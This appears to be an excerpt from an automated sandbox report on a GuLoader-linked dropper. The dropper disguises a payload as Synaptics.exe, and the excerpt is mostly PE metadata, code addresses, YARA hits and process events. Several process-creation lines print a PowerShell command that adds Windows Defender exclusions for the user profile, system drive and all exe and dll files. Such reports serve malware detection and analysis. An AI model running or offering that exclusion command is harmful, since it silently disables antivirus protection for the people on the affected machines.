                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00496E18
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0046B1E4
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045FCC8
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00453DA4
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00406D5F
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_687E1BFF
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004601F0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0046C7CC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0048C7F4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0044EA40
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00496E18
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0046B1E4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045FCC8
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00453DA4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004601F0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0046C7CC
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0048C7F4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0044EA40
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00496E18
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0046B1E4
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045FCC8
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00453DA4
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeProcess Stats: CPU usage > 98%
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: uniformerede.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: ._cache_uniformerede.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                                Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: RCXCD96.tmp.6.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: YC9w8Aif.exe.9.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: RCXDA77.tmp.9.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: RCXF979.tmp.9.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: ~$cache1.9.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeSection loaded: starttiledata.dll
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeSection loaded: starttiledata.dll
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00406CDC appears 32 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004049E4 appears 40 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 0049058C appears 112 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00404A58 appears 34 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004109E8 appears 68 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004049C0 appears 117 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004865B4 appears 38 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00486788 appears 32 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004070F0 appears 168 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00404CCC appears 108 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 004967D4 appears 36 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 00403F78 appears 32 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: String function: 0040F7A4 appears 42 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: String function: 0049058C appears 56 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: String function: 004109E8 appears 34 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: String function: 004049C0 appears 73 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: String function: 004070F0 appears 81 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: String function: 00404CCC appears 54 times
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0043F118 NtdllDefWindowProc_A,GetCapture,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004598AC NtdllDefWindowProc_A,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042F60C NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0043F118 NtdllDefWindowProc_A,GetCapture,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004598AC NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,73C9B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_0042F60C NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0043F118 NtdllDefWindowProc_A,GetCapture,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004598AC NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0045E9EC SHGetPathFromIDList,SHGetPathFromIDList,NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0044EA40 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_0042F60C NtdllDefWindowProc_A,
                                Source: uniformerede.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Source: uniformerede.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Source: uniformerede.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Source: Synaptics.exe.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCXCD96.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: YC9w8Aif.exe.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCXDA77.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Source: RCXDA77.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCXF979.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Source: RCXF979.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: OriginalFileName vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: OriginalFilenameb! vs SecuriteInfo.com.Variant.FakeAlert.2.24488.exe
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220527Jump to behavior
                                Source: classification engineClassification label: mal100.troj.evad.winEXE@21/60@6/2
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00425FB8 GetLastError,FormatMessageA,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004747D8 FindResourceA,
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeVirustotal: Detection: 62%
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeReversingLabs: Detection: 58%
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe"
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\uniformerede.exe "C:\Users\user\AppData\Local\Temp\uniformerede.exe"
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\Users\user\Desktop\._cache_uniformerede.exe "C:\Users\user\Desktop\._cache_uniformerede.exe"
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00475958 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,GetLastError,
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeFile created: C:\Users\user\AppData\Local\Temp\uniformerede.exeJump to behavior
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_004021AA CoCreateInstance,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00409ED2 GetDiskFreeSpaceA,
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_01
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_01
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6620
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeFile written: C:\Users\user\AppData\Local\Temp\udfrielser.iniJump to behavior
                                Source: Yara matchFile source: 12.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Synaptics.exe.400000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Synaptics.exe.400000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.Synaptics.exe.400000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.uniformerede.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.348826366.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.285408477.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.361096693.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.310907115.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXCD96.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\uniformerede.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RCXF979.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmp, type: DROPPED
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENSJump to behavior
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic file information: File size 1490944 > 1048576
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x136600

                                Data Obfuscation

                                barindex
                                Yara detected GuLoader
                                Source: Yara matchFile source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00446564 push 004465F1h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00406B3C push 00406B8Dh; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00478CB0 push 00478D2Dh; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00422044 push ecx; mov dword ptr [esp], edx
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042E010 push 0042E03Ch; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0046C0B0 push ecx; mov dword ptr [esp], eax
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004761F8 push 0047623Bh; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0049419C push 004941CFh; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042E1BC push 0042E1E8h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00480210 push 0048023Ch; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004842DC push 00484308h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048036C push 00480398h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042C3D0 push 0042C3FCh; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00432468 push 004324B4h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00486408 push 004864ADh; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0047C404 push 0047C430h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00432404 push 00432447h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004324C0 push 0043250Bh; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0042C4C4 push 0042C4F0h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004464FC push 00446562h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00490554 push 00490580h; ret
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0047A514 push 0047A540h; ret
